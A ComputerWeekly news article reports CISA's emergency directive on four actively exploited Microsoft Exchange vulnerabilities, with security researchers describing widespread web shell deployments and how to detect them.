The US government’s Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning all government civilian departments and agencies running an on-premise Microsoft Exchange installation to update or disconnect the product as the impact of four newly disclosed vulnerabilities – CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 – spreads.
The CISA has also called on US agencies to collect forensic images and search for known indicators of compromise (IOCs) in response to active exploitation of the vulnerabilities, which have prompted an out-of-sequence patch from Microsoft.
“This emergency directive will help us secure federal networks against the immediate threat while CISA works with its interagency partners to better understand the malicious actor’s techniques and motivations to share with our stakeholders,” said acting CISA director Brandon Wales.
“The swiftness with which CISA issued this emergency directive reflects the seriousness of this vulnerability and the importance of all organisations – in government and the private sector – to take steps to remediate it.”
Nominet government security expert Steve Forbes commented: “CISA’s directive … for agencies to report back on their level of exposure, apply security fixes, or disconnect the program, is the latest in a series of increasingly regular emergency directives the agency has issued since it was established two years ago.
“Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications,” he said.
Caution on the part of public sector organisations – the UK’s National Cyber Security Centre has also issued an alert – appears well-advised, as security researchers and observers from around the world weigh in on the vulnerabilities, saying they may be being much more widely exploited than Microsoft’s disclosure would imply.
“The swiftness with which CISA issued this emergency directive reflects the seriousness of this [Microsoft Exchange] vulnerability and the importance of all organisations – in government and the private sector – to take steps to remediate it” Brandon Wales, CISA
While Redmond described the attacks as targeted and limited – and likely originating from a Chinese state-backed actor known as Hafnium in its classification matrix – John Hammond of Huntress Security said his own scans had identified over 200 of his firm’s partners’ servers that had received web shell payloads as per Microsoft’s disclosure.
“These companies do not perfectly align with Microsoft’s guidance as some personas are small hotels, an ice-cream company, a kitchen appliance manufacture, multiple senior citizen communities and other mid-market businesses,” said Hammond.
“We’ve also witnessed many city and county government victims, healthcare providers, banks [and] financial institutions, and several residential electricity providers.”
Hammond said that among the vulnerable servers his scans had found over 350 web shells (some clients may have more than one) which potentially indicates automated deployment or multiple uncoordinated actors. He added that the endpoints observed did have antivirus or endpoint detection and response on board, but that the threat actors appeared to be slipping past most defensive products, making patching even more crucial.
“With insight from the community, we’ve seen honeypots attacked, making it clear that threat actors are just scanning the internet looking for low-hanging fruit,” he said.
“These attacks are grave due to the fact that every organisation [relies on] email and Microsoft Exchange is so widely used. These servers are typically publicly accessible on the open internet and they can be exploited remotely. These vulnerabilities can be leveraged to gain remote code execution and fully compromise the target. From there, the attackers have a foothold in the network and can expand their access and do much more damage.”
Red Canary intelligence director Katie Nickels said she, too, was observing activity related to the exploitation of the disclosed vulnerabilities, but there was some good news in that, in this case, post-exploitation activity is highly detectable.
“We will never be able to stop zero-days, but organisations that practice defence-in-depth and maintain behavioural analytics to alert on common attacks should feel confident about their ability to detect this activity,” she said.
“Some of the activity we observed uses the China Chopper web shell, which has been around for more than eight years, giving defenders ample time to develop detection logic for it. [And] while we can never fully prevent all exploitation, defenders can work to decrease the time it takes to identify post-exploitation activity. By catching it as quickly as possible, they can stop adversaries from gaining an additional foothold in their environment and causing significant damage,” she said.
Source is ComputerWeekly.com
Edge computing is growing with the increasing demand for real time processing and reduced latency in today's digital landscape. The rise...
Source is ComputerWeekly.com
Amazon Web Services (AWS) reported a 17.5% year-on-year increase in revenue to $30.9bn during the second quarter of its 2025 financial...
Source is ComputerWeekly.com
The Competition and Markets Authority (CMA) has confirmed Microsoft and Amazon Web Services (AWS) will face “targeted and bespoke” interventions to...
Source is ComputerWeekly.com
Microsoft Cloud grew 27%, with revenue of $46.7bn, in its fourth quarter 2025 financial results, the tech giant has reported. While...
Source is ComputerWeekly.com
The collection of key datacentre sustainability data by operators is faltering after years of progress, according to research by server farm...